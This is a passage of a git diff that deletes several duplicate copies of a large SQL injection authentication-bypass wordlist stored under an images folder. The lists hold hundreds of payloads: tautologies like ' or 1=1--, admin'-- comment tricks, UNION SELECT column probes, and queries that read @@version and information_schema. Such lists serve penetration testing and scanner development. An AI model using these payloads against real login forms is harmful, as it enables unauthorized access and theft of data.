-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
